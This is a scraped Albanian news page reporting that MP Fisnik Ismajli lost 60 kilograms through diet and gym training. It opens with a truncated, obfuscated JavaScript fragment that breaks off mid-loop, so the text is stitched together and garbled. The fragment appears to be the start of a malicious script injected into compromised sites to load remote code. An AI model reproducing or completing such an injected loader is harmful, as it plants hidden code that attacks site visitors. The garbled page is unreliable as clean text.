;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Transformimi drastik i Fisnik Ismajlit, deputeti ka hequr 60-të kilogramë

By

Një krahasim në mes dy fotografive është gjithçka që flet për një fenomen e situatë të caktuar.

Para e pas, janë imazhet më të fuqishme që dokumentojnë një proces jetësor, natyror apo çfarëdoqoftë.

Dhe deputeti nga radhët e Partisë Socialdemokrate, Fisnik Ismajli, është dëshmia më e mirë se si disiplina, përkushtimi dhe vullneti, bëjnë mrekulli.

Nëse e mbani në mend në fillimet e karrierës së tij politike, ai ishte shtatlartë dhe me mbipeshë, por në një moment të jetës, vendosi ta transformonte fizikun e tij.

Nga imazhet para e pas që deputeti ka publikuar në Instagramin e tij, vërehet shndërrimi i jashtëzakonshëm që ka bërë Ismajli, duke hequr 60-të kilogramë për disa vjet.

Ajo që duhet të theksohet, është se deputeti dhe krijuesi i obeliskut Newborn në Prishtinë, ka ndjekur një regjim të shëndetshëm ushqimor, të shoqëruar me aktivitet fizik në palestër me trajnerët e tij personalë. /Prive.al

Artikuj të ngjashëm